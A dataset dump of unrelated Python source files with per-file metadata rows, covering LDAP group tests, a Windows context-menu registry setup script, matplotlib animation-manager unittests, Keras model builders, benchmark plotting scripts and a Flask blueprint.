assert 1 == sum(1 for member in ret['foo']['member'] if member.startswith('uid=foo,'))
def test_remove_user_group(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.create_group('foo')
ldap_bootstrap.add_user_group('foo', 'foo')
ldap_bootstrap.remove_user_group('foo', 'foo')
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
print(ret)
assert not any(member.startswith('uid=foo,') for member in ret['foo']['member'])
def test_remove_user_group_twice(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.create_group('foo')
ldap_bootstrap.add_user_group('foo', 'foo')
ldap_bootstrap.remove_user_group('foo', 'foo')
ldap_bootstrap.remove_user_group('foo', 'foo')
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
print(ret)
assert not any(member.startswith('uid=foo,') for member in ret['foo']['member'])
def test_create_group_posix(ldap_bootstrap):
ldap_bootstrap.create_group('foo', gidNumber=1000)
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
def test_add_user_group_posix(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.create_group('foo', gidNumber=1000)
ldap_bootstrap.add_user_group('foo', 'foo')
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
assert 'foo' in ret['foo']['memberUid']
def test_add_user_group_posix_twice(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.create_group('foo', gidNumber=1000)
ldap_bootstrap.add_user_group('foo', 'foo')
ldap_bootstrap.add_user_group('foo', 'foo')
ret = ldap_bootstrap.list_groups()
print(ret)
assert list(ret.keys()) == ['foo']
if isinstance(ret['foo']['memberUid'], str):
assert 'foo' in ret['foo']['memberUid']
else:
assert 1 == sum(1 for member in ret['foo']['memberUid'] if member == 'foo')
def test_remove_user_group_posix(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.create_group('foo', gidNumber=1000)
ldap_bootstrap.add_user_group('foo', 'foo')
ldap_bootstrap.remove_user_group('foo', 'foo')
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
print(ret)
assert 'memberUid' not in ret['foo'] or 'foo' not in ret['foo']['memberUid']
def test_remove_user_group_posix_twice(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.create_group('foo', gidNumber=1000)
ldap_bootstrap.add_user_group('foo', 'foo')
ldap_bootstrap.remove_user_group('foo', 'foo')
ldap_bootstrap.remove_user_group('foo', 'foo')
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
print(ret)
assert 'memberUid' not in ret['foo'] or 'foo' not in ret['foo']['memberUid']
| 40.556122
| 135
| 0.699711
| 1,062
| 7,949
| 5.001883
| 0.070621
| 0.230045
| 0.092997
| 0.083208
| 0.872741
| 0.840926
| 0.802146
| 0.744917
| 0.734187
| 0.698795
| 0
| 0.009668
| 0.14115
| 7,949
| 195
| 136
| 40.764103
| 0.76842
| 0.017738
| 0
| 0.668874
| 0
| 0
| 0.140441
| 0
| 0
| 0
| 0
| 0
| 0.278146
| 1
| 0.139073
| false
| 0
| 0.019868
| 0
| 0.15894
| 0.033113
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d3f6e1be907a46c751b69c28887f3d5795c685b
| 1,147
|
py
|
Python
|
tools/code_helper/register.py
|
tkgamegroup/flame
|
f1628100cc66e13f84ea3047ea33af019caeb01b
|
[
"MIT"
] | 25
|
2018-02-28T05:59:50.000Z
|
2022-03-18T03:11:52.000Z
|
tools/code_helper/register.py
|
tkgamegroup/flame
|
e5884c7a773c351f3dadadbdb908cfe00f1ce586
|
[
"MIT"
] | null | null | null |
tools/code_helper/register.py
|
tkgamegroup/flame
|
e5884c7a773c351f3dadadbdb908cfe00f1ce586
|
[
"MIT"
] | 5
|
2018-05-17T04:16:30.000Z
|
2021-12-22T04:02:02.000Z
|
import os
flame_path = os.environ["FLAME_PATH"]
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\NewComponentTemplate /VE /F /D \"New Component Template\"")
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\NewComponentTemplate\\Command /VE /F /D \"%s\\code_helper.exe -cmd new_component_template\"" % (flame_path + "\\bin\\debug"))
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\NewSystemTemplate /VE /F /D \"New System Template\"")
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\NewSystemTemplate\\Command /VE /F /D \"%s\\code_helper.exe -cmd new_system_template\"" % (flame_path + "\\bin\\debug"))
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\NewGeneralTemplate /VE /F /D \"New General Template\"")
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\NewGeneralTemplate\\Command /VE /F /D \"%s\\code_helper.exe -cmd new_general_template\"" % (flame_path + "\\bin\\debug"))
# Have not find a good way to add by code
print("You can add this tool to visual studio's external tools, use \"-path $(ItemPath)\" as parameter")
| 88.230769
| 194
| 0.742807
| 168
| 1,147
| 4.922619
| 0.321429
| 0.058041
| 0.079807
| 0.101572
| 0.749698
| 0.719468
| 0.719468
| 0.719468
| 0.719468
| 0.719468
| 0
| 0
| 0.088928
| 1,147
| 12
| 195
| 95.583333
| 0.790431
| 0.034002
| 0
| 0
| 0
| 0
| 0.608145
| 0.390045
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.111111
| null | null | 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4b072c837e805507bb2d7182b2e6443665ff5a5
| 17,760
|
py
|
Python
|
mpl_animationmanager/test/test_based_on_examples.py
|
luchko/mpl_animation-manager
|
04405c8c73b72cbfbe0f39a0dbe7a90172b3a5cb
|
[
"MIT"
] | 16
|
2017-04-14T00:27:45.000Z
|
2021-04-28T10:59:28.000Z
|
mpl_animationmanager/test/test_based_on_examples.py
|
luchko/mpl_animation-manager
|
04405c8c73b72cbfbe0f39a0dbe7a90172b3a5cb
|
[
"MIT"
] | null | null | null |
mpl_animationmanager/test/test_based_on_examples.py
|
luchko/mpl_animation-manager
|
04405c8c73b72cbfbe0f39a0dbe7a90172b3a5cb
|
[
"MIT"
] | 2
|
2018-05-16T10:02:47.000Z
|
2020-07-09T02:33:57.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Unittest of the Matplotlib animation manager basic functionality
Unittests is strongly binded with the example moudules and AnimationManager
class itself which support TestCase running.
Unittest should be run by passing the TestCase to manager instance (mng)
via the nmg.runUnitTest(MyTestCase) method.
TestCase gets access to the figure axes and the manager dialog during
the TestCase instance creationg via __init__ method.
You might want to decrease DELAY constant or signal processing in the main loop
in order to make test run faster. Also you might want to icrease DELAY in case
test fail due to larte delay in slots are processing.
"""
__author__ = "Ivan Luchko (luchko.ivan@gmail.com)"
__version__ = "1.0a1"
__date__ = "Apr 4, 2017"
__copyright__ = "Copyright (c) 2017, Ivan Luchko and Project Contributors "
import os
import time
import unittest
from mpl_animationmanager.examples import oscillation_2D
from mpl_animationmanager.examples import rot_graph_3D
from mpl_animationmanager.examples import modif_wireframe_3D
from mpl_animationmanager.examples import modif_randwalk_3D
test_folder = "./mpl_animationmanager/test/"
DELAY = 0.5 # [sec] delay for signal processing in the main loop
def isRotated(ax, dlg):
'''
returns True if 3D axes is rotated
this function should be executed in separate thread
'''
azim0 = ax.azim
# wait some time until 3D axes are rotated in main thread
time.sleep(1.1/dlg.fps)
return azim0 != ax.azim
class modif_oscillation_2D_Test(unittest.TestCase):
'''Animation manager test based on the '2D oscillation' example'''
def __init__(self, testname, ax, dlg):
unittest.TestCase.__init__(self, testname)
self.ax, self.dlg = ax, dlg
self.fig = self.ax.get_figure()
self.dlg.spinBox_period_modif.setValue(5)
def test_initialization(self):
'''
test widgets comonent according to type of figure and animation
- 2D/3D axes
- object modification present
'''
# curent example has modification
self.assertTrue(self.dlg.widget_modif.isVisible())
self.assertTrue(self.dlg.checkBox_modif.isChecked())
# curent example are axes 2D, thus object can be rotated
self.assertTrue(not self.dlg.widget_rot.isVisible())
self.assertTrue(not self.dlg.checkBox_rot.isChecked())
self.assertAlmostEqual(self.dlg.period, self.dlg.period_modif)
def test_quality_props(self):
# change dpi
dpi = 50
self.dlg.spinBox_dpi.setValue(dpi)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.dpi, dpi)
self.assertEqual(self.fig.get_dpi(), dpi)
# change fps
fps = 10
self.dlg.spinBox_fps.setValue(fps)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.fps, fps)
# restore defaults:
self.dlg.spinBox_dpi.setValue(100)
self.dlg.spinBox_fps.setValue(24)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
def test_modif_props(self):
# change modification period
t = 30
self.dlg.spinBox_period_modif.setValue(t)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.period_modif, t)
self.assertEqual(self.dlg.period, t)
def test_control_btns(self):
# test pause button
self.dlg.btnPause.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
# test start button
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
# test stop button
self.dlg.btnStop.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
# test start button
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
def test_exportAnim(self):
# make the animation small for faster export
self.dlg.spinBox_dpi.setValue(30)
self.dlg.spinBox_fps.setValue(10)
self.dlg.spinBox_period_modif.setValue(2)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
# export animation
path = os.path.abspath(test_folder+"test")
self.dlg.lineEdit_name.setText(path)
self.dlg.EXPORT_RUNNING = True
self.dlg.btnExport.click()
# wait until exporting is finished
while self.dlg.EXPORT_RUNNING: time.sleep(2*DELAY)
self.assertTrue(os.path.exists(self.dlg.filepath))
# remove testfile
os.remove(self.dlg.filepath)
# restore default settings
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
# make the animation small for faster export
self.dlg.spinBox_dpi.setValue(100)
self.dlg.spinBox_fps.setValue(24)
self.dlg.spinBox_period_modif.setValue(10)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
def test_Info(self):
# make the animation small for faster export
self.dlg.btnAsk.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(self.dlg.msg.isVisible())
self.dlg.msg.accept()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(not self.dlg.msg.isVisible())
class rot_graph_3D_Test(unittest.TestCase):
'''Animation manager test based on the '3D rotated graph' example'''
def __init__(self, testname, ax, dlg):
unittest.TestCase.__init__(self, testname)
self.ax, self.dlg = ax, dlg
self.fig = self.ax.get_figure()
def test_initialization(self):
'''
test widgets comonent according to type of figure and animation
- 2D/3D axes
- object modification present
'''
# curent example has no modification
self.assertTrue(not self.dlg.widget_modif.isVisible())
self.assertTrue(not self.dlg.checkBox_modif.isChecked())
# curent example are axes 3D, thus object can be rotated
self.assertTrue(self.dlg.widget_rot.isVisible())
self.assertTrue(self.dlg.checkBox_rot.isChecked())
self.assertAlmostEqual(self.dlg.period, self.dlg.period_rot)
def test_quality_props(self):
# change dpi
dpi = 50
self.dlg.spinBox_dpi.setValue(dpi)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.dpi, dpi)
self.assertEqual(self.fig.get_dpi(), dpi)
# change fps
fps = 10
self.dlg.spinBox_fps.setValue(fps)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.fps, fps)
# restore defaults:
self.dlg.spinBox_dpi.setValue(100)
self.dlg.spinBox_fps.setValue(24)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
def test_3D_props(self):
# change rotation period
t = 30
self.dlg.spinBox_period_rot.setValue(t)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.period_rot, t)
self.assertEqual(self.dlg.period, t)
# change elevation
elev = 10
self.dlg.spinBox_elev.setValue(elev)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.elevation, elev)
self.assertEqual(self.ax.elev, elev)
# enable/diable rotation
self.dlg.checkBox_rot.setChecked(False)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
self.assertTrue(not isRotated(self.ax, self.dlg))
self.dlg.checkBox_rot.setChecked(True)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
self.assertTrue(isRotated(self.ax, self.dlg))
# change initial azimut
azim = -50
self.dlg.btnStop.click()
time.sleep(DELAY) # wait for signal handling in the main event loop
self.dlg.spinBox_azim.setValue(azim)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.zero_azim, azim)
self.assertEqual(self.ax.azim, azim)
def test_control_btns(self):
# test pause button
self.dlg.btnPause.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(not isRotated(self.ax, self.dlg))
# test start button
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(isRotated(self.ax, self.dlg))
# test stop button
self.assertNotEqual(self.ax.azim, self.dlg.spinBox_azim.value())
self.dlg.btnStop.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(not isRotated(self.ax, self.dlg))
self.assertEqual(self.ax.azim, self.dlg.spinBox_azim.value())
# test start button
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(isRotated(self.ax, self.dlg))
def test_exportAnim(self):
# make the animation small for faster export
self.dlg.spinBox_dpi.setValue(30)
self.dlg.spinBox_fps.setValue(10)
self.dlg.spinBox_period_rot.setValue(2)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
# export animation
path = os.path.abspath(test_folder+"test")
self.dlg.lineEdit_name.setText(path)
self.dlg.EXPORT_RUNNING = True
self.dlg.btnExport.click()
# wait until exporting is finished
while self.dlg.EXPORT_RUNNING: time.sleep(2*DELAY)
self.assertTrue(os.path.exists(self.dlg.filepath))
# remove testfile
os.remove(self.dlg.filepath)
# restore default settings
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(isRotated(self.ax, self.dlg))
# make the animation small for faster export
self.dlg.spinBox_dpi.setValue(100)
self.dlg.spinBox_fps.setValue(24)
self.dlg.spinBox_period_rot.setValue(10)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
class randwalk_3D_Test(unittest.TestCase):
'''Animation manager test based on the '3D Random walk' example'''
def __init__(self, testname, ax, dlg):
unittest.TestCase.__init__(self, testname)
self.ax, self.dlg = ax, dlg
self.fig = self.ax.get_figure()
def test_initialization(self):
'''
test widgets comonent according to type of figure and animation
- 2D/3D axes
- object modification present
'''
# curent example has modification
self.assertTrue(self.dlg.widget_modif.isVisible())
self.assertTrue(self.dlg.checkBox_modif.isChecked())
# curent example are axes 3D, thus object can be rotated
self.assertTrue(self.dlg.widget_rot.isVisible())
self.assertTrue(self.dlg.checkBox_rot.isChecked())
# period is least commot multiple of period_modif and period_rot
self.assertTrue(self.dlg.period % self.dlg.period_modif == 0)
self.assertTrue(self.dlg.period % self.dlg.period_rot == 0)
def test_quality_props(self):
# change dpi
dpi = 50
self.dlg.spinBox_dpi.setValue(dpi)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.dpi, dpi)
self.assertEqual(self.fig.get_dpi(), dpi)
# change fps
fps = 10
self.dlg.spinBox_fps.setValue(fps)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.fps, fps)
# restore defaults:
self.dlg.spinBox_dpi.setValue(100)
self.dlg.spinBox_fps.setValue(24)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
def test_modif_props(self):
# change modification period
t = 30
self.dlg.spinBox_period_modif.setValue(t)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.period_modif, t)
# period is least commot multiple of period_modif and period_rot
self.assertTrue(self.dlg.period % self.dlg.period_modif == 0)
self.assertTrue(self.dlg.period % self.dlg.period_rot == 0)
def test_3D_props(self):
# change rotation period
t = 25
self.dlg.spinBox_period_rot.setValue(t)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.period_rot, t)
# period is least commot multiple of period_modif and period_rot
self.assertTrue(self.dlg.period % self.dlg.period_modif == 0)
self.assertTrue(self.dlg.period % self.dlg.period_rot == 0)
# change elevation
elev = 10
self.dlg.spinBox_elev.setValue(elev)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.elevation, elev)
self.assertEqual(self.ax.elev, elev)
# enable/diable rotation
self.dlg.checkBox_rot.setChecked(False)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
self.assertTrue(not isRotated(self.ax, self.dlg))
self.dlg.checkBox_rot.setChecked(True)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
self.assertTrue(isRotated(self.ax, self.dlg))
# change initial azimut
azim = -50
self.dlg.btnStop.click()
time.sleep(DELAY) # wait for signal handling in the main event loop
self.dlg.spinBox_azim.setValue(azim)
time.sleep(DELAY) # wait for signal handling in the main event loop
self.assertEqual(self.dlg.zero_azim, azim)
self.assertEqual(self.ax.azim, azim)
def test_control_btns(self):
# test pause button
self.dlg.btnPause.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(not isRotated(self.ax, self.dlg))
# test start button
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(isRotated(self.ax, self.dlg))
# test stop button
self.assertNotEqual(self.ax.azim, self.dlg.spinBox_azim.value())
self.dlg.btnStop.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(not isRotated(self.ax, self.dlg))
self.assertEqual(self.ax.azim, self.dlg.spinBox_azim.value())
# test start button
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(isRotated(self.ax, self.dlg))
def test_exportAnim(self):
# make the animation small for faster export
self.dlg.spinBox_dpi.setValue(30)
self.dlg.spinBox_fps.setValue(10)
self.dlg.spinBox_period_rot.setValue(2)
self.dlg.spinBox_period_modif.setValue(2)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
# export animation
path = os.path.abspath(test_folder+"test")
self.dlg.lineEdit_name.setText(path)
self.dlg.EXPORT_RUNNING = True
self.dlg.btnExport.click()
# wait until exporting is finished
while self.dlg.EXPORT_RUNNING: time.sleep(2*DELAY)
self.assertTrue(os.path.exists(self.dlg.filepath))
# remove testfile
os.remove(self.dlg.filepath)
# restore default settings
self.dlg.btnStart.click()
time.sleep(2*DELAY) # wait for signal handling in the main event loop
self.assertTrue(isRotated(self.ax, self.dlg))
# make the animation small for faster export
self.dlg.spinBox_dpi.setValue(100)
self.dlg.spinBox_fps.setValue(24)
self.dlg.spinBox_period_rot.setValue(10)
self.dlg.spinBox_period_modif.setValue(20)
time.sleep(3*DELAY) # wait for signal handling in the main event loop
def main():
'''run test suits and return the error code'''
TestExamples_list = [(oscillation_2D, modif_oscillation_2D_Test),
(rot_graph_3D, rot_graph_3D_Test),
(modif_randwalk_3D, randwalk_3D_Test)]
WAS_SUCCESSFUL = True
for example, exampleTestCase in TestExamples_list:
mng = example.get_animManager()
result = mng.runUnitTest(MyTestCase=exampleTestCase) #TestResult instance
WAS_SUCCESSFUL = WAS_SUCCESSFUL and result.wasSuccessful()
return not WAS_SUCCESSFUL
if __name__ == "__main__":
main()
| 38.111588
| 81
| 0.648874
| 2,352
| 17,760
| 4.80102
| 0.102041
| 0.092366
| 0.038257
| 0.073326
| 0.868845
| 0.861672
| 0.851399
| 0.82678
| 0.823858
| 0.813762
| 0
| 0.013081
| 0.263964
| 17,760
| 466
| 82
| 38.111588
| 0.85075
| 0.296847
| 0
| 0.825279
| 0
| 0
| 0.012774
| 0.004176
| 0
| 0
| 0
| 0
| 0.245353
| 1
| 0.081784
| false
| 0
| 0.026022
| 0
| 0.126394
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4f0f8731d2f032b138d7d11c0a604e3436513c0
| 1,590
|
py
|
Python
|
keras_models.py
|
roberto1648/churn-prediction-with-pyspark-and-keras
|
ff11cb7f9058e33587909c7a0775f55995a9fede
|
[
"MIT"
] | 4
|
2019-12-15T13:35:00.000Z
|
2020-09-21T03:11:27.000Z
|
keras_models.py
|
roberto1648/churn-prediction-with-pyspark-and-keras
|
ff11cb7f9058e33587909c7a0775f55995a9fede
|
[
"MIT"
] | null | null | null |
keras_models.py
|
roberto1648/churn-prediction-with-pyspark-and-keras
|
ff11cb7f9058e33587909c7a0775f55995a9fede
|
[
"MIT"
] | 2
|
2021-01-17T15:52:00.000Z
|
2021-03-29T00:18:25.000Z
|
from keras.layers import Dense, Dropout, Flatten
from keras.models import Input, Model
import keras
def model1(
input_shape=(None, 20),
hidden_layers=[(4, 0.25), (4, 0.25)],
nlabels=1,
verbose=True,
):
inp = x = Input(batch_shape=input_shape, name='input')
for layer_number, (n_units, dropout_rate) in enumerate(hidden_layers):
name = "hidden_{}".format(layer_number)
x = Dense(n_units, activation='relu', name=name)(x)
if dropout_rate > 0:
name = "dropout_{}".format(layer_number)
x = Dropout(dropout_rate, name=name)(x)
x = Dense(nlabels, activation='linear', name='predictions')(x)
model = Model(inputs=inp, outputs=x)
if verbose: print model.summary()
return model
def model2(
input_shape=(None, 20),
hidden_layers=[(4, 0.25), (4, 0.25)],
nlabels=1,
reg_weight=0.01,
verbose=True,
):
inp = x = Input(batch_shape=input_shape, name='input')
for layer_number, (n_units, dropout_rate) in enumerate(hidden_layers):
name = "hidden_{}".format(layer_number)
x = Dense(n_units,
activation='relu',
name=name,
kernel_regularizer=keras.regularizers.l2(reg_weight),
)(x)
if dropout_rate > 0:
name = "dropout_{}".format(layer_number)
x = Dropout(dropout_rate, name=name)(x)
x = Dense(nlabels, activation='linear', name='predictions')(x)
model = Model(inputs=inp, outputs=x)
if verbose: print model.summary()
return model
| 28.392857
| 74
| 0.607547
| 204
| 1,590
| 4.573529
| 0.264706
| 0.07074
| 0.017149
| 0.07717
| 0.831726
| 0.831726
| 0.831726
| 0.831726
| 0.831726
| 0.831726
| 0
| 0.025402
| 0.257233
| 1,590
| 55
| 75
| 28.909091
| 0.764606
| 0
| 0
| 0.714286
| 0
| 0
| 0.056639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.071429
| null | null | 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
25845a5a8e312c3e1324e3d235a8450f8bd0a6b0
| 3,395
|
py
|
Python
|
scripts/4_postprocess_sets_tps/4_plot_tps.py
|
gokul-uf/asl-fall-2017
|
83e882d9d4c52bdd279b4e3eed8cd7ac768e88d7
|
[
"MIT"
] | 1
|
2018-06-13T16:57:59.000Z
|
2018-06-13T16:57:59.000Z
|
scripts/4_postprocess_sets_tps/4_plot_tps.py
|
gokul-uf/asl-fall-2017
|
83e882d9d4c52bdd279b4e3eed8cd7ac768e88d7
|
[
"MIT"
] | null | null | null |
scripts/4_postprocess_sets_tps/4_plot_tps.py
|
gokul-uf/asl-fall-2017
|
83e882d9d4c52bdd279b4e3eed8cd7ac768e88d7
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
num_threads = [8, 16, 32, 64]
# sns.set()
plt.figure()
plt.title("Throughput vs. Num of Virtual Clients")
for num_thread in num_threads:
num_vc = []
val = []
std = []
with open("csvs/write_tps_t_{}_tps.csv".format(num_thread)) as f:
for line in f:
vc, v, s = [float(x) for x in line.strip().split(",")][:3]
num_vc.append(vc)
val.append(v)
std.append(s)
plt.errorbar(x = num_vc, y = val, yerr = std, label = "{} Threads".format(num_thread), capsize = 2)
plt.grid(linestyle = "dotted")
plt.ylabel("Throughput (Ops / sec)")
plt.xlabel("Number of Virtual Clients")
plt.legend()
# plt.yticks([0] + val)
plt.ylim(ymin=0)
plt.xticks([0] + num_vc)
plt.savefig("4_set_tps_tps.png")
plt.figure()
plt.title("Response Time vs. Num of Virtual Clients")
for num_thread in num_threads:
num_vc = []
val = []
std = []
with open("csvs/write_tps_t_{}_rt.csv".format(num_thread)) as f:
for line in f:
vc, v, s = [float(x) for x in line.strip().split(",")][:3]
num_vc.append(vc)
val.append(v)
std.append(s)
plt.errorbar(x = num_vc, y = val, yerr = std, label = "{} Threads".format(num_thread), capsize = 2)
plt.grid(linestyle = "dotted")
plt.ylabel("Response Time (ms)")
plt.xlabel("Number of Virtual Clients")
plt.ylim(ymin=0)
plt.legend()
plt.xticks([0] + num_vc)
plt.savefig("4_set_tps_rt.png")
plt.figure()
plt.title("Queueing Time vs. Num of Virtual Clients")
for num_thread in num_threads:
num_vc = []
val = []
std = []
with open("csvs/write_tps_t_{}_q_wt.csv".format(num_thread)) as f:
for line in f:
vc, v, s = [float(x) for x in line.strip().split(",")][:3]
num_vc.append(vc)
val.append(v)
std.append(s)
plt.errorbar(x = num_vc, y = val, yerr = std, label = "{} Threads".format(num_thread), capsize = 2)
plt.grid(linestyle = "dotted")
plt.ylabel("Queueing Time (ms)")
plt.xlabel("Number of Virtual Clients")
plt.ylim(ymin=0)
plt.legend()
plt.xticks([0] + num_vc)
plt.savefig("4_set_tps_q_wt.png")
plt.figure()
plt.title("Waiting for MC Time vs. Num of Virtual Clients")
for num_thread in num_threads:
num_vc = []
val = []
std = []
with open("csvs/write_tps_t_{}_mc_wait.csv".format(num_thread)) as f:
for line in f:
vc, v, s = [float(x) for x in line.strip().split(",")][:3]
num_vc.append(vc)
val.append(v)
std.append(s)
plt.errorbar(x = num_vc, y = val, yerr = std, label = "{} Threads".format(num_thread), capsize = 2)
plt.grid(linestyle = "dotted")
plt.ylabel("Waiting Time (ms)")
plt.xlabel("Number of Virtual Clients")
plt.ylim(ymin=0)
plt.legend()
plt.xticks([0] + num_vc)
plt.savefig("4_set_tps_mc_wt.png")
plt.figure()
plt.title("Queue Length vs. Num of Virtual Clients")
for num_thread in num_threads:
num_vc = []
val = []
std = []
with open("csvs/write_tps_t_{}_q_len.csv".format(num_thread)) as f:
for line in f:
vc, v, s = [float(x) for x in line.strip().split(",")][:3]
num_vc.append(vc)
val.append(v)
std.append(s)
plt.errorbar(x = num_vc, y = val, yerr = std, label = "{} Threads".format(num_thread), capsize = 2)
plt.grid(linestyle = "dotted")
plt.ylabel("Queue Length (num requests)")
plt.xlabel("Number of Virtual Clients")
plt.ylim(ymin=0)
plt.legend()
plt.xticks([0] + num_vc)
plt.savefig("4_set_tps_q_len.png")
| 27.16
| 100
| 0.663328
| 585
| 3,395
| 3.700855
| 0.150427
| 0.046189
| 0.073903
| 0.039261
| 0.860046
| 0.836028
| 0.815704
| 0.8
| 0.8
| 0.8
| 0
| 0.011575
| 0.160236
| 3,395
| 125
| 101
| 27.16
| 0.747808
| 0.009131
| 0
| 0.754717
| 0
| 0
| 0.221297
| 0.041939
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04717
| 0
| 0.04717
| 0.009434
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
258e6c20d1e58a43b469aaccab0db85cada6c1ea
| 98
|
py
|
Python
|
info/api/house/__init__.py
|
googleliyang/flask_house_rent
|
93299086058ef5e6e32759c15fba2ade21c992b5
|
[
"Apache-2.0"
] | null | null | null |
info/api/house/__init__.py
|
googleliyang/flask_house_rent
|
93299086058ef5e6e32759c15fba2ade21c992b5
|
[
"Apache-2.0"
] | 4
|
2021-03-18T22:19:24.000Z
|
2022-03-11T23:40:16.000Z
|
info/api/house/__init__.py
|
googleliyang/flask_house_rent
|
93299086058ef5e6e32759c15fba2ade21c992b5
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint
house_print = Blueprint('house_print', __name__)
from . import house
| 19.6
| 48
| 0.795918
| 13
| 98
| 5.538462
| 0.538462
| 0.388889
